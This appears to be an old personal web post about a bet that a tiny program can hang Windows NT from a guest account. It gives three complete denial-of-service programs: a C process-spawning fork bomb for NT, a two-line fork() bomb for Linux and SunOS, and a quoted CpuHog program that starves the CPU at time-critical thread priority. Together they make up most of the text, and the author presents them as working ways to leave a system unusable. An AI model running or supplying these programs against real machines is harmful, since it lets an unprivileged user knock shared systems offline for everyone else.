I made a bet with some pro-NT dude that it is possible to write a few-line program which will hang NT from any account (including guest). I was not very honest as I knew that NT internals site, among other excellent things (well, as much as anything NT-related can be excellent...), contains such example. To my big disappointment, I was unable to find it there now. I am afraid that this fact as well as site name change, as well as reciprocial link to/from Micro$oft site (they got some stupid "shareware price" from them) shows a very sad tendency.

So I was challenged to write it myself. After all, it was no-brainer:

/* file: crazyfork.c */
#include <windows.h>
#include <stdio.h>

void main ()
{
   STARTUPINFO si;
   SECURITY_ATTRIBUTES saProcess, saThread;
   PROCESS_INFORMATION piProcess;

   ZeroMemory (&si, sizeof(si));
   si.cb = sizeof(si);

   saProcess.nLength = sizeof(saProcess);
   saProcess.lpSecurityDescriptor = NULL;
   saProcess.bInheritHandle = TRUE;

   saThread.nLength = sizeof(saThread);
   saThread.lpSecurityDescriptor = NULL;
   saThread.bInheritHandle = FALSE;

   while (1)
   {
	if (CreateProcess(NULL, "crazyfork", &saProcess, &saThread, FALSE, 0,
      	NULL, NULL, &si, &piProcess))
        {   printf ("new process created\n");   }
        else
        {   printf ("unable create process\n"); }
   }
}

Works very well. The system is going to completely unusable state. To my second big disappointment in this story,

void main ()
{
   while (1)
   {   fork ();   }
}

works equally well on Linux and SunOS. But I think unix shines here neveretheless - you are able to crash it in the same way with a much elegant piece of code than in NT case.

And finally, to the benefit of the mankind, piece from NT internals (I found it after all in my download junk):

//============================================================================
// CpuHog.c
//
// Copyright (C) 1996 Mark Russinovich
//
// How vulnerable is NT? Here is a 5 line program, runnable from a
// guest account, that instantly cripples an NT system. Once started, no
// other program will run, and there is no way to stop it. No, not even 
// task manager can get a shot at the CPU after CpuHog is off and running!
//============================================================================
#include <windows.h>

//---------------------------------------------------------
//
// main
//
// Set thread to highest priority allowed for programs
// that run without administrative privilege and just sit
// in a loop.
//
//---------------------------------------------------------
int WINAPI WinMain(	HINSTANCE hInstance, 
				   HINSTANCE hPrevInstance,	
				   LPSTR lpCmdLine,
				   int nCmdShow )
{
	MessageBox( NULL, "CpuHog V1.0\n\Copyright (C) 1996 Mark Russinovich\n"
        			"http://www.ntinternals.com", "CpuHog", MB_OK );
	SetThreadPriority( GetCurrentThread(),
			THREAD_PRIORITY_TIME_CRITICAL );
	while(1);

	// never get here
	return 0;
}